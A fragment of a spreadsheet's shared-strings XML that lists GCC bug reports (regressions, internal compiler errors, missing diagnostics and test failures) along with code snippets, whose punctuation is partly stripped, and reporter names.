    <t>GCC-28513</t>
  </si>
  <si>
    <t>[4.2/4.3/4.4 Regression] QOI: Diagnostic missing since 3.3.x when naming rule is violated</t>
  </si>
  <si>
    <t>class foo {
public:
  typedef int bar
}
class baz {
public:
  foo::bar foo
}
With G++ 3.3.6 this errors out with this diagnostic:
$ g++-3.3 -pedantic -Wall -Wcast-align -Wwrite-strings -Wswitch-default -Wcast-qual -Wunused-variable -Wredundant-decls -Wctor-dtor-privacy -Wnon-virtual-dtor -Wreorder -Wold-style-cast -Woverloaded-virtual -fstrict-aliasing -c foo.cc
foo.cc:8: error: declaration of `int baz::foo'
foo.cc:1: error: changes meaning of `foo' from `class foo'
With G++ 3.4 4.0 4.1 and 4.2 (current CVS) no diagnostic is issued.
A diagnostic is not strictly required by the standard (Â§3.3.6 basic.scope.class) but would be very useful.
Regards
Roger</t>
  </si>
  <si>
    <t>rleigh</t>
  </si>
  <si>
    <t>GCC-43888</t>
  </si>
  <si>
    <t>[4.5/4.6 Regression] FAIL: gcc.dg/alias-7.c execution test</t>
  </si>
  <si>
    <t>Here's what the alias-7.c test looks like after preprocessing:
&gt; int foo __asm__ (_ foo) __attribute__((nocommon))
&gt; extern __typeof (foo) bar __attribute__ ((weak alias (foo)))
&gt; 
&gt; int
&gt; main (void)
&gt; {
&gt;   if (&amp;foo != &amp;bar || foo || bar)
&gt;     abort ()
&gt;   return bar
&gt; }
  But here's how it compiles down using 4.5.0 on i686-pc-cygwin:
&gt; alias-7.c.003t.original:
&gt;  Function main (null)
&gt;  enabled by -tree-original
&gt; 
&gt; 
&gt; {
&gt;   if (1)
&gt;     {
&gt;       abort ()
&gt;     }
&gt;   return bar
&gt; }
  I've established that fold_comparison is returning (integer_cst 1) for the
&amp;foo != &amp;bar test.  In this clause
&gt;       /* For non-equal bases we can simplify if they are addresses
&gt; 	 of local binding decls or constants.  */
&gt;       else if (indirect_base0 &amp;&amp; indirect_base1
&gt; 	       /* We know that !operand_equal_p (base0 base1 0)
&gt; 		  because the if condition was false.  But make
&gt; 		  sure two decls are not the same.  */
&gt; 	       &amp;&amp; base0 != base1
&gt; 	       &amp;&amp; TREE_CODE (arg0) == ADDR_EXPR
&gt; 	       &amp;&amp; TREE_CODE (arg1) == ADDR_EXPR
&gt; 	       &amp;&amp; (((TREE_CODE (base0) == VAR_DECL
&gt; 		     || TREE_CODE (base0) == PARM_DECL)
&gt; 		    &amp;&amp; (targetm.binds_local_p (base0)
&gt; 			|| CONSTANT_CLASS_P (base1)))
&gt; 		   || CONSTANT_CLASS_P (base0))
&gt; 	       &amp;&amp; (((TREE_CODE (base1) == VAR_DECL
&gt; 		     || TREE_CODE (base1) == PARM_DECL)
&gt; 		    &amp;&amp; (targetm.binds_local_p (base1)
&gt; 			|| CONSTANT_CLASS_P (base0)))
&gt; 		   || CONSTANT_CLASS_P (base1)))
&gt; 	{
&gt; 	  if (code == EQ_EXPR)
&gt; 	    return omit_two_operands_loc (loc type boolean_false_node
&gt; 				      arg0 arg1)
&gt; 	  else if (code == NE_EXPR)
&gt; 	    return omit_two_operands_loc (loc type boolean_true_node
&gt; 				      arg0 arg1)
&gt; 	}
it seems that i386_pe_binds_local_p is incorrectly returning true even for the
weak symbol.  I have a patch.</t>
  </si>
  <si>
    <t>GCC-15576</t>
  </si>
  <si>
    <t>[4.0 Regression] Class initialization optimization is disabled</t>
  </si>
  <si>
    <t>gcj used to perform an optimization which eliminated redundant class
initialization calls. For example given the following example
_Jv_InitClass(Foo) is called twice from Init.a() when it is only needed once:
class Foo 
{
  static int a
  static int b
}
public class Init
{
  int a()
  { 
    return Foo.a + Foo.b
  }
}
This was done in expr.c build_class_init() look for
LOCAL_CLASS_INITIALIZATION_FLAG. The optimization was turned off in tree-ssa
branch and needs to be updated to work with the gimplifier.</t>
  </si>
  <si>
    <t>GCC-48961</t>
  </si>
  <si>
    <t>EXECUTE_COMMAND_LINE(WAIT=.false.) fails on MinGW</t>
  </si>
  <si>
    <t>When calling the EXECUTE_COMMAND_LINE intrinsic on Windows and setting the WAIT argument to .false. the execution causes a runtime error.
For example:
program hello
    print * Hello world
end program hello
program test_execute
    call execute_command_line(hello.exe .false.)
end program test_execute
&gt;test_execute
 Hello world
Fortran runtime error: Could not execute command line
Expected result: 
No runtime error should occur.
Fortran 2008:
13.7.57 EXECUTE_COMMAND_LINE (COMMAND [ WAIT EXITSTAT CMDSTAT CMDMSG ])
...
3   Arguments.
...
WAIT (optional) shall be a default logical scalar. It is an INTENT (IN) argument. If WAIT is present with the value false and the processor supports asynchronous execution of the command the command is executed asynchronously otherwise it is executed synchronously.
5   When the command is executed synchronously EXECUTE_COMMAND_LINE returns after the command line has completed execution. Otherwise EXECUTE_COMMAND_LINE returns without waiting.</t>
  </si>
  <si>
    <t>GCC-81038</t>
  </si>
  <si>
    <t>[8 regression] test case g++.dg/vect/slp-pr56812.cc fails starting with r248678</t>
  </si>
  <si>
    <t>This test case was failing recently (https://gcc.gnu.org/bugzilla/show_bug.cgi?id=80925) but starting working again.  Now it is failing once more.
spawn -ignore SIGHUP /home/seurer/gcc/build/gcc-trunk/gcc/testsuite/g++2/../../xg++ -B/home/seurer/gcc/build/gcc-trunk/gcc/testsuite/g++2/../../ /home/seurer/gcc/gcc-trunk/gcc/testsuite/g++.dg/vect/slp-pr56812.cc -fno-diagnostics-show-caret -fdiagnostics-color=never -nostdinc++ -I/home/seurer/gcc/build/gcc-trunk/powerpc64-unknown-linux-gnu/libstdc++-v3/include/powerpc64-unknown-linux-gnu -I/home/seurer/gcc/build/gcc-trunk/powerpc64-unknown-linux-gnu/libstdc++-v3/include -I/home/seurer/gcc/gcc-trunk/libstdc++-v3/libsupc++ -I/home/seurer/gcc/gcc-trunk/libstdc++-v3/include/backward -I/home/seurer/gcc/gcc-trunk/libstdc++-v3/testsuite/util -fmessage-length=0 -std=c++98 -O2 -ftree-vectorize -fno-vect-cost-model -maltivec -mpower8-vector -fdump-tree-slp-details -O3 -funroll-loops -fvect-cost-model=dynamic -S -o slp-pr56812.s
PASS: g++.dg/vect/slp-pr56812.cc  -std=c++98 (test for excess errors)
FAIL: g++.dg/vect/slp-pr56812.cc  -std=c++98  scan-tree-dump-times slp1 basic block vectorized 1
Executing on host: /home/seurer/gcc/build/gcc-trunk/gcc/testsuite/g++2/../../xg++ -B/home/seurer/gcc/build/gcc-trunk/gcc/testsuite/g++2/../../ /home/seurer/gcc/gcc-trunk/gcc/testsuite/g++.dg/vect/slp-pr56812.cc  -fno-diagnostics-show-caret -fdiagnostics-color=never  -nostdinc++ -I/home/seurer/gcc/build/gcc-trunk/powerpc64-unknown-linux-gnu/libstdc++-v3/include/powerpc64-unknown-linux-gnu -I/home/seurer/gcc/build/gcc-trunk/powerpc64-unknown-linux-gnu/libstdc++-v3/include -I/home/seurer/gcc/gcc-trunk/libstdc++-v3/libsupc++ -I/home/seurer/gcc/gcc-trunk/libstdc++-v3/include/backward -I/home/seurer/gcc/gcc-trunk/libstdc++-v3/testsuite/util -fmessage-length=0  -std=c++11 -O2 -ftree-vectorize -fno-vect-cost-model -maltivec -mpower8-vector -fdump-tree-slp-details -O3 -funroll-loops -fvect-cost-model=dynamic  -S   -o slp-pr56812.s    (timeout = 300)
spawn -ignore SIGHUP /home/seurer/gcc/build/gcc-trunk/gcc/testsuite/g++2/../../xg++ -B/home/seurer/gcc/build/gcc-trunk/gcc/testsuite/g++2/../../ /home/seurer/gcc/gcc-trunk/gcc/testsuite/g++.dg/vect/slp-pr56812.cc -fno-diagnostics-show-caret -fdiagnostics-color=never -nostdinc++ -I/home/seurer/gcc/build/gcc-trunk/powerpc64-unknown-linux-gnu/libstdc++-v3/include/powerpc64-unknown-linux-gnu -I/home/seurer/gcc/build/gcc-trunk/powerpc64-unknown-linux-gnu/libstdc++-v3/include -I/home/seurer/gcc/gcc-trunk/libstdc++-v3/libsupc++ -I/home/seurer/gcc/gcc-trunk/libstdc++-v3/include/backward -I/home/seurer/gcc/gcc-trunk/libstdc++-v3/testsuite/util -fmessage-length=0 -std=c++11 -O2 -ftree-vectorize -fno-vect-cost-model -maltivec -mpower8-vector -fdump-tree-slp-details -O3 -funroll-loops -fvect-cost-model=dynamic -S -o slp-pr56812.s
PASS: g++.dg/vect/slp-pr56812.cc  -std=c++11 (test for excess errors)
FAIL: g++.dg/vect/slp-pr56812.cc  -std=c++11  scan-tree-dump-times slp1 basic block vectorized 1
Executing on host: /home/seurer/gcc/build/gcc-trunk/gcc/testsuite/g++2/../../xg++ -B/home/seurer/gcc/build/gcc-trunk/gcc/testsuite/g++2/../../ /home/seurer/gcc/gcc-trunk/gcc/testsuite/g++.dg/vect/slp-pr56812.cc  -fno-diagnostics-show-caret -fdiagnostics-color=never  -nostdinc++ -I/home/seurer/gcc/build/gcc-trunk/powerpc64-unknown-linux-gnu/libstdc++-v3/include/powerpc64-unknown-linux-gnu -I/home/seurer/gcc/build/gcc-trunk/powerpc64-unknown-linux-gnu/libstdc++-v3/include -I/home/seurer/gcc/gcc-trunk/libstdc++-v3/libsupc++ -I/home/seurer/gcc/gcc-trunk/libstdc++-v3/include/backward -I/home/seurer/gcc/gcc-trunk/libstdc++-v3/testsuite/util -fmessage-length=0  -std=c++14 -O2 -ftree-vectorize -fno-vect-cost-model -maltivec -mpower8-vector -fdump-tree-slp-details -O3 -funroll-loops -fvect-cost-model=dynamic  -S   -o slp-pr56812.s    (timeout = 300)
spawn -ignore SIGHUP /home/seurer/gcc/build/gcc-trunk/gcc/testsuite/g++2/../../xg++ -B/home/seurer/gcc/build/gcc-trunk/gcc/testsuite/g++2/../../ /home/seurer/gcc/gcc-trunk/gcc/testsuite/g++.dg/vect/slp-pr56812.cc -fno-diagnostics-show-caret -fdiagnostics-color=never -nostdinc++ -I/home/seurer/gcc/build/gcc-trunk/powerpc64-unknown-linux-gnu/libstdc++-v3/include/powerpc64-unknown-linux-gnu -I/home/seurer/gcc/build/gcc-trunk/powerpc64-unknown-linux-gnu/libstdc++-v3/include -I/home/seurer/gcc/gcc-trunk/libstdc++-v3/libsupc++ -I/home/seurer/gcc/gcc-trunk/libstdc++-v3/include/backward -I/home/seurer/gcc/gcc-trunk/libstdc++-v3/testsuite/util -fmessage-length=0 -std=c++14 -O2 -ftree-vectorize -fno-vect-cost-model -maltivec -mpower8-vector -fdump-tree-slp-details -O3 -funroll-loops -fvect-cost-model=dynamic -S -o slp-pr56812.s
PASS: g++.dg/vect/slp-pr56812.cc  -std=c++14 (test for excess errors)
FAIL: g++.dg/vect/slp-pr56812.cc  -std=c++14  scan-tree-dump-times slp1 basic block vectorized 1
testcase /home/seurer/gcc/gcc-trunk/gcc/testsuite/g++.dg/vect/vect.exp completed in 6 seconds</t>
  </si>
  <si>
    <t>GCC-66100</t>
  </si>
  <si>
    <t>[6 Regression] ICE in simplify_bound</t>
  </si>
  <si>
    <t>&gt; cat bug.f90
MODULE qs_integrate_potential_low
  INTEGER PARAMETER :: dp = 8
  TYPE cell_type
    REAL(KIND=8) :: h_inv(33)
  END TYPE
  TYPE(cell_type) POINTER                 :: cell
  REAL(KIND=dp) DIMENSION(3)              :: rp
  CONTAINS
    SUBROUTINE integrate_general_opt()
    REAL(KIND=dp) :: gp(3)
    INTEGER :: ng
      gp=MATMUL(cell%h_invrp)*ng
    END SUBROUTINE integrate_general_opt
END MODULE qs_integrate_potential_low
with 
gcc version 6.0.0 20150511 (experimental) [trunk revision 222989] (GCC) 
&gt; gfortran -O1 bug.f90
f951: internal compiler error: in simplify_bound at fortran/simplify.c:3467
0x659389 simplify_bound
	../../gcc/gcc/fortran/simplify.c:3463
0x5f7fa1 do_simplify
	../../gcc/gcc/fortran/intrinsic.c:4149
0x605618 gfc_intrinsic_func_interface(gfc_expr* int)
	../../gcc/gcc/fortran/intrinsic.c:4403
0x5edf62 gfc_simplify_expr(gfc_expr* int)
	../../gcc/gcc/fortran/expr.c:1837
0x708365 get_array_inq_function
	../../gcc/gcc/fortran/frontend-passes.c:2018
0x70d5a9 scalarized_expr
	../../gcc/gcc/fortran/frontend-passes.c:2657
0x70b8e2 inline_matmul_assign
	../../gcc/gcc/fortran/frontend-passes.c:3000
0x70bde9 gfc_code_walker(gfc_code** int (*)(gfc_code** int* void*) int (*)(gfc_expr** int* void*) void*)
	../../gcc/gcc/fortran/frontend-passes.c:3188
0x70ce6b optimize_namespace
	../../gcc/gcc/fortran/frontend-passes.c:989
0x70ce38 optimize_namespace
	../../gcc/gcc/fortran/frontend-passes.c:995
0x70cfc3 gfc_run_passes(gfc_namespace*)
	../../gcc/gcc/fortran/frontend-passes.c:129
0x637bda gfc_parse_file()
	../../gcc/gcc/fortran/parse.c:5477
0x678ef5 gfc_be_parse_file
	../../gcc/gcc/fortran/f95-lang.c:228
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-58235</t>
  </si>
  <si>
    <t>Missing diagnostic on assignment to array in c89</t>
  </si>
  <si>
    <t>struct bla
{
    int x[1]
} s = {{0}}
struct bla foo(void)
{
    return s
}
void bar(void)
{
    int c[1]
    c = foo().x
}
gcc in c89 mode (-std=c89 -Wall -pedantic) does not issue a diagnostic for the assignment to a non-modifiable lvalue in bar function. -std=c99 or -std=c11 do issue the required diagnostic.</t>
  </si>
  <si>
    <t>olivier.gay</t>
  </si>
  <si>
    <t>GCC-46088</t>
  </si>
  <si>
    <t>[4.6 Regression] ICE: SIGSEGV in ix86_binary_operator_ok (i386.c:15025) with -Os -fnon-call-exceptions -fpeel-loops</t>
  </si>
  <si>
    <t>Created attachment 22088
reduced testcase
Command line:
$ gcc -Os -fnon-call-exceptions -fpeel-loops pr46088.c
Related valgrind output:
$ valgrind -q --trace-children=yes gcc -Os -fnon-call-exceptions -fpeel-loops pr46088.c
==14275== Invalid read of size 2
==14275==    at 0xA7C8EC: ix86_binary_operator_ok (i386.c:15025)
==14275==    by 0xDF3063: recog (i386.md:10038)
==14275==    by 0xEE9313: recog_for_combine (combine.c:10480)
==14275==    by 0xF16107: try_combine (combine.c:3220)
==14275==    by 0xF2141D: rest_of_handle_combine (combine.c:1187)
==14275==    by 0x79613E: execute_one_pass (passes.c:1562)
==14275==    by 0x7963D4: execute_pass_list (passes.c:1617)
==14275==    by 0x7963E6: execute_pass_list (passes.c:1618)
==14275==    by 0x8E30F5: tree_rest_of_compilation (tree-optimize.c:419)
==14275==    by 0xAAC341: cgraph_expand_function (cgraphunit.c:1494)
==14275==    by 0xAAE909: cgraph_optimize (cgraphunit.c:1553)
==14275==    by 0xAAEE69: cgraph_finalize_compilation_unit (cgraphunit.c:1016)
==14275==  Address 0xabababababababab is not stack'd malloc'd or (recently) free'd
==14275== 
pr46088.c: In function 'foo':
pr46088.c:7:1: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Tested revisions:
r165699 - crash
r159696 - crash
r158095 - OK
4.5 r163761 - OK</t>
  </si>
  <si>
    <t>GCC-57270</t>
  </si>
  <si>
    <t>std::is_function ignores function ref-qualifiers</t>
  </si>
  <si>
    <t>Following the resolution of 57253 (http://gcc.gnu.org/bugzilla/show_bug.cgi?id=57253) it seems worthwhile to point out that there are missing specializations of std::function such that e.g.
    static_assert( std::is_function&lt;void()
is triggered.</t>
  </si>
  <si>
    <t>GCC-23926</t>
  </si>
  <si>
    <t>[4.1 Regression] libstdc++-v3 configure failed</t>
  </si>
  <si>
    <t>libstdc++-v3/configure include illegal shell script.
it comes from 1.446 to 1.447. see bellow
----
*** 8715987169 ****
  # If we never went through the GLIBCXX_CHECK_LINKER_FEATURES macro then we
  # don't know enough about $LD to do tricks...
! # FIXME  The following test is too strict in theory.
! if test $enable_shared = no ||
!         test x$LD = x ||
!         test x$glibcxx_gnu_ld_version = x then
!   enable_symvers=no
  fi
  # Check to see if libgcc_s exists indicating that shared libgcc is possible.
--- 8715987186 ----
  # If we never went through the GLIBCXX_CHECK_LINKER_FEATURES macro then we
  # don't know enough about $LD to do tricks...
! 
! # Turn a 'yes' into a suitable default.
! if test x$enable_symvers = xyes  then
!   if test $enable_shared = no ||
!      test x$LD = x  then
!     enable_symvers=no
!   elif test $with_gnu_ld == yes  then
!     enable_symvers=gnu
!   else
!     case ${target_os} in
!       darwin*)
!       enable_symvers=darwin-export 
!       *)
!       { echo $as_me:$LINENO: WARNING: === You have requested some kind of sym
bol versioning but &gt;&amp;5
! echo $as_me: WARNING: === You have requested some kind of symbol versioning 
but &gt;}
!       { echo $as_me:$LINENO: WARNING: === you are not using a supported linke
r. &gt;&amp;5
! echo $as_me: WARNING: === you are not using a supported linker. &gt;}
!       { echo $as_me:$LINENO: WARNING: === Symbol versioning will be disabled.
 &gt;&amp;5
! echo $as_me: WARNING: === Symbol versioning will be disabled. &gt;}
!       enable_symvers=no 
!     esac
!   fi
  fi
----
elif test $with_gnu_ld == yes  then
may be
elif test $with_gnu_ld = yes  then</t>
  </si>
  <si>
    <t>gnu</t>
  </si>
  <si>
    <t>GCC-17999</t>
  </si>
  <si>
    <t>[4.0 Regression] libfortran: uses some C99 functions (snprintf)</t>
  </si>
  <si>
    <t>The most ovbious fix here is to link in libiberty.a which has snprintf.</t>
  </si>
  <si>
    <t>GCC-61537</t>
  </si>
  <si>
    <t>[4.9/4.10 Regression] template parameter lists wrongly detected on struct or class keyword on parameters</t>
  </si>
  <si>
    <t>Created attachment 32956
sample code
When I define a template method outside of its template class declaration it cannot use the class or struct keyword on normal parameters.
This worked up to gcc 4.8. If I remove the struct or class keyword everything works fine again. I tried -std=c++98 without success.
If I write the definition inside the class Base { ... } it also works.
When I try to compile the code (see attachment) I get the following error:
$ g++ main.cc
main.cc:17:38: error: too many template-parameter-lists
 void Base::do_sth(S param struct Dummy) // not working
                                      ^
main.cc:17:6: error: prototype for â€˜void Base::do_sth(S int)â€™ does not match any in class â€˜Baseâ€™
 void Base::do_sth(S param struct Dummy) // not working
      ^
main.cc:11:18: error: candidate is: template template void Base::do_sth(S Dummy)
             void do_sth(S param struct Dummy dummy)
$ gcc -v
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-linux-gnu/4.9/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Debian 4.9.0-6' --with-bugurl=file:///usr/share/doc/gcc-4.9/README.Bugs --enable-languages=cc++javagodfortranobjcobj-c++ --prefix=/usr --program-suffix=-4.9 --enable-shared --enable-linker-build-id --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.9 --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-gnu-unique-object --disable-libmudflap --enable-plugin --with-system-zlib --disable-browser-plugin --enable-java-awt=gtk --enable-gtk-cairo --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-4.9-amd64/jre --enable-java-home --with-jvm-root-dir=/usr/lib/jvm/java-1.5.0-gcj-4.9-amd64 --with-jvm-jar-dir=/usr/lib/jvm-exports/java-1.5.0-gcj-4.9-amd64 --with-arch-directory=amd64 --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --enable-objc-gc --enable-multiarch --with-arch-32=i586 --with-abi=m64 --with-multilib-list=m32m64mx32 --enable-multilib --with-tune=generic --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 4.9.0 (Debian 4.9.0-6)</t>
  </si>
  <si>
    <t>abutcher</t>
  </si>
  <si>
    <t>alexander.adam</t>
  </si>
  <si>
    <t>GCC-78232</t>
  </si>
  <si>
    <t>[7 Regression] FAIL: gcc.dg/torture/pr48124-4.c</t>
  </si>
  <si>
    <t>Hi
Since r241824:
commit 6df23cf103de2671effb6adaf49348409141b462
Author: segher 
Date:   Thu Nov 3 16:04:22 2016 +0000
    combine lhs zero_extract fix (PR78186)
        PR rtl-optimization/78186
        * combine.c (change_zero_ext): Mask the RHS of a zero_extract as
        well when converting to IOR.
    git-svn-id: svn+ssh://gcc.gnu.org/svn/gcc/trunk@241824 138bc75d-0d04-0410-96
I have noticed execution failures on old arm targets:
   gcc.dg/torture/pr48124-4.c   -O1  execution test
  gcc.dg/torture/pr48124-4.c   -O2  execution test
  gcc.dg/torture/pr48124-4.c   -O2 -flto -fno-use-linker-plugin -flto-partition=none  execution test
  gcc.dg/torture/pr48124-4.c   -O2 -flto -fuse-linker-plugin -fno-fat-lto-objects  execution test
  gcc.dg/torture/pr48124-4.c   -O3 -g  execution test
  gcc.dg/torture/pr48124-4.c   -Os  execution test
For instance on target arm-none-linux-gnueabi --with-cpu=cortex-a9
--with-mode=arm
and running the tests with -march=armv5t
or on arm-none-eabi with default mode/cpu and no special runtest flags
if that's easier.</t>
  </si>
  <si>
    <t>GCC-9883</t>
  </si>
  <si>
    <t>[mipsel] segfault while compiling libgcc2.c</t>
  </si>
  <si>
    <t>Internal compiler error while compiling libgcc2.c (crosscompile target mipsel)
Release:
gcc version 3.2 (Debian)
Environment:
Configured with: ../src/configure -v --enable-languages=c --prefix=/usr --infodir=/usr/share/info --mandir=/usr/share/man --with-gxx-include-dir=/usr/mipsel/include/g++ --enable-shared --with-gnu-as --with-gnu-ld --with-system-zlib --enable-long-long --enable-nls --without-included-gettext --disable-checking --build=i386-linux --host=i386-linux --target=mipsel
Thread model: single
Linux 2.4.20 on i686
How-To-Repeat:
$ ./xgcc -B/b/gcc-mipsel-3.2/build/gcc/ -B/usr/mipsel/bin/ -B/usr/mipsel/lib/ -isystem /usr/mipsel/include -O2  -DIN_GCC -DCROSS_COMPILE   -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -isystem ./include  -G 0 -g  -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED -Dinhibit_libc -I. -I. -I../../src/gcc -I../../src/gcc/. -I../../src/gcc/config -I../../src/gcc/../include  -msoft-float -DL_floatdidf -c ../../src/gcc/libgcc2.c -o libgcc/soft-float/_floatdidf.o
../../src/gcc/libgcc2.c: In function `__floatdidf':
../../src/gcc/libgcc2.c:1061: internal error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>sherw</t>
  </si>
  <si>
    <t>GCC-8322</t>
  </si>
  <si>
    <t>SSE2 intrinsics broken?</t>
  </si>
  <si>
    <t>Errors when xmmintrin.h is included in a file (see compiler output in attachment).
Release:
g++ (GCC) 3.3 20021021 (experimental)
Environment:
linux-i686
How-To-Repeat:
// main.cpp: 
#include 
int main() {}
-----
&gt; g++ -mmmx -msse -msse2 main.cpp
In file included from main.cpp:1:
/usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.3/include/xmmintrin.h: In function `
   vector float _mm_loadh_pi(vector float vector int*)':
/usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.3/include/xmmintrin.h:653: error: cannot
   convert `vector int*' to `vector long long int*' for argument `2' to `vector
   float __builtin_ia32_loadhps(vector float vector long long int*)'
...</t>
  </si>
  <si>
    <t>fdumas</t>
  </si>
  <si>
    <t>GCC-83063</t>
  </si>
  <si>
    <t>[8 Regression] ICE on an invalid preprocessor snippet</t>
  </si>
  <si>
    <t>Starting from r254707 we do an invalid read on:
$ cat ice.cpp
#define a(...) b##__VA_OPT__ ()
a ()
$ valgrind --leak-check=yes --trace-children=yes g++ ice.cpp
==18518== Memcheck a memory error detector
==18518== Copyright (C) 2002-2017 and GNU GPL'd by Julian Seward et al.
==18518== Using Valgrind-3.13.0 and LibVEX rerun with -h for copyright info
==18518== Command: g++ ice.cpp
==18518== 
==18520== Memcheck a memory error detector
==18520== Copyright (C) 2002-2017 and GNU GPL'd by Julian Seward et al.
==18520== Using Valgrind-3.13.0 and LibVEX rerun with -h for copyright info
==18520== Command: /home/marxin/bin/gcc/lib/gcc/x86_64-pc-linux-gnu/8.0.0/cc1plus -quiet -D_GNU_SOURCE ice.cpp -quiet -dumpbase ice.cpp -mtune=generic -march=x86-64 -auxbase ice -o /tmp/ccqffetG.s
==18520== 
==18520== Use of uninitialised value of size 8
==18520==    at 0x16C6D0B: paste_all_tokens (macro.c:889)
==18520==    by 0x16C6D0B: cpp_get_token_1(cpp_reader* unsigned int*) (macro.c:2636)
==18520==    by 0x8CE7AE: c_lex_with_flags(tree_node** unsigned int* unsigned char* int) (c-lex.c:399)
==18520==    by 0x75164E: cp_lexer_get_preprocessor_token(cp_lexer* cp_token*) (parser.c:793)
==18520==    by 0x792E23: cp_parser_initial_pragma (parser.c:38614)
==18520==    by 0x792E23: cp_lexer_new_main (parser.c:647)
==18520==    by 0x792E23: cp_parser_new (parser.c:3859)
==18520==    by 0x792E23: c_parse_file() (parser.c:39019)
==18520==    by 0x8DA226: c_common_parse_file() (c-opts.c:1127)
==18520==    by 0xDC0C8E: compile_file() (toplev.c:455)
==18520==    by 0x60A5E4: do_compile (toplev.c:2059)
==18520==    by 0x60A5E4: toplev::main(int char**) (toplev.c:2194)
==18520==    by 0x60C8AA: main (main.c:39)
==18520== 
==18520== Invalid read of size 1
==18520==    at 0x16C6D0B: paste_all_tokens (macro.c:889)
==18520==    by 0x16C6D0B: cpp_get_token_1(cpp_reader* unsigned int*) (macro.c:2636)
==18520==    by 0x8CE7AE: c_lex_with_flags(tree_node** unsigned int* unsigned char* int) (c-lex.c:399)
==18520==    by 0x75164E: cp_lexer_get_preprocessor_token(cp_lexer* cp_token*) (parser.c:793)
==18520==    by 0x792E23: cp_parser_initial_pragma (parser.c:38614)
==18520==    by 0x792E23: cp_lexer_new_main (parser.c:647)
==18520==    by 0x792E23: cp_parser_new (parser.c:3859)
==18520==    by 0x792E23: c_parse_file() (parser.c:39019)
==18520==    by 0x8DA226: c_common_parse_file() (c-opts.c:1127)
==18520==    by 0xDC0C8E: compile_file() (toplev.c:455)
==18520==    by 0x60A5E4: do_compile (toplev.c:2059)
==18520==    by 0x60A5E4: toplev::main(int char**) (toplev.c:2194)
==18520==    by 0x60C8AA: main (main.c:39)
==18520==  Address 0x4 is not stack'd malloc'd or (recently) free'd</t>
  </si>
  <si>
    <t>GCC-83093</t>
  </si>
  <si>
    <t>ICE in fold_convert_loc at fold-const.c:2266</t>
  </si>
  <si>
    <t>With invalid code down to at least 4.8 :
$ cat z1.f90
program p
   character(:) allocatable :: z
   allocate (character(a) :: z)
end
$ cat z2.f90
program p
   real :: a = 2
   character(:) allocatable :: z
   allocate (character(a) :: z)
end
$ cat z3.f90
program p
   character(:) allocatable :: z
   allocate (character((1.0)) :: z)
end
$ gfortran-8-20171119 -c z1.f90
z1.f90:3:0:
    allocate (character(a) :: z)
internal compiler error: in fold_convert_loc at fold-const.c:2266
0x9060ff fold_convert_loc(unsigned int tree_node* tree_node*)
        ../../gcc/fold-const.c:2265
0x734581 gfc_allocate_allocatable(stmtblock_t* tree_node* tree_node* tree_node* tree_node* tree_node* tree_node* tree_node* gfc_expr* int)
        ../../gcc/fortran/trans.c:800
0x7a0dbd gfc_trans_allocate(gfc_code*)
        ../../gcc/fortran/trans-stmt.c:6220
0x732b07 trans_code
        ../../gcc/fortran/trans.c:1980
0x7598cc gfc_generate_function_code(gfc_namespace*)
        ../../gcc/fortran/trans-decl.c:6437
0x6eb720 translate_all_program_units
        ../../gcc/fortran/parse.c:6091
0x6eb720 gfc_parse_file()
        ../../gcc/fortran/parse.c:6294
0x72ff5f gfc_be_parse_file
        ../../gcc/fortran/f95-lang.c:204</t>
  </si>
  <si>
    <t>GCC-9284</t>
  </si>
  <si>
    <t>[3.3/3.4 regression] c++ finds wrongly ambigous overloading</t>
  </si>
  <si>
    <t>With GCC 3.3 most qt and KDE programs fail - and those worked fine
with GCC 3.2 and older.
Compiling the test program below with different compilers shows that
GCC 3.3 and newer give different results than the older compiler:
gromit:~/tmp:[1]$ /opt/gcc/3.2-devel/bin/gcc -c kde.cc -Wall
gromit:~/tmp:[0]$ /opt/gcc/3.3-devel/bin/gcc -c kde.cc -Wall
kde.cc: In member function `QString&amp; QString::prepend(const char*)':
kde.cc:18: error: call of overloaded `insert(int const char*&amp;)' is ambiguous
kde.cc:12: error: candidates are: QString&amp; QString::insert(unsigned int const 
   QString&amp;)
kde.cc:13: error:                 QString&amp; QString::insert(unsigned int QChar)
gromit:~/tmp:[1]$ /opt/gcc/3.4-devel/bin/gcc -c kde.cc -Wall
kde.cc: In member function `QString&amp; QString::prepend(const char*)':
kde.cc:18: error: call of overloaded `insert(int const char*&amp;)' is ambiguous
kde.cc:12: error: candidates are: QString&amp; QString::insert(unsigned int const 
   QString&amp;)
kde.cc:13: error:                 QString&amp; QString::insert(unsigned int QChar)
Gabriel Dos Reis commented on this with:
| This is clearly bogus:  There is no conversion sequence from 'const char*'
| to QChar.  Please fill that in GNATS database as a regression.
Release:
3.3 20030105 (prerelease)
Environment:
System: Linux gromit 2.4.18 #1 Sat Apr 6 22:05:01 CEST 2002 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: /cvs/gcc-3_3-branch/configure --prefix=/opt/gcc/3.3-devel --disable-nls --enable-threads=posix --enable-clocale=gnu --enable-__cxa_atexit --enable-shared --enable-languages=cc++f77javaobjcadatreelang --enable-checking=misctreertlgcrtlflag --with-system-zlib
How-To-Repeat:
Compile the following program:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
class QChar {
public:
    QChar( char c )
    QChar( unsigned char c )
}
class QString
{
public:
    QString( const char *str )                 // deep copy
    QString    
    QString    
    QString    
}
